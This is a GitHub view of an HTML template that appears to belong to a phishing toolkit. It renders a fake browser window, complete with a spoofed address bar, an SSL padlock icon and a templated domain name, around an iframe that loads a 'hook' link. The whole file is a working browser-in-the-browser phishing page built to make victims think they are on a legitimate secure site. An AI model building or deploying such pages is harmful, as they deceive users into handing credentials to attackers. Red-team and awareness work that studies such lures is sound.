-
Notifications
You must be signed in to change notification settings - Fork 477
/
Copy pathindex.html
34 lines (32 loc) · 1.15 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="{{ url_for('static', filename='phishing/') }}{{ template_static_dir }}/style.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
<div id="window">
<!-- Title bar start -->
<div id="title-bar-width">
<div id="title-bar" class="outer yosemite">
<span class="dots">
<div id="exit" class="dot red"></div>
<div id="minimize" class="dot amber"></div>
<div id="maximize" class="dot green"></div>
</span>
<span id="logo-description">{{ phishing_title }}</span>
</div>
<div id="url-bar">
<img src="{{ url_for('static', filename='phishing/') }}{{ template_static_dir }}/ssl.svg" width="20px" height="20px" id="ssl-padlock">
<span id="domain-name">{{ domain_name }}</span>
<span id="domain-path">{{ domain_path }}</span>
</div>
</div>
<!-- Content start -->
<iframe id="content" src="{{ hook_link }}" frameBorder="0"></iframe>
</div>
</body>
<script src="{{ url_for('static', filename='common/js/script.js') }}"></script>
</html>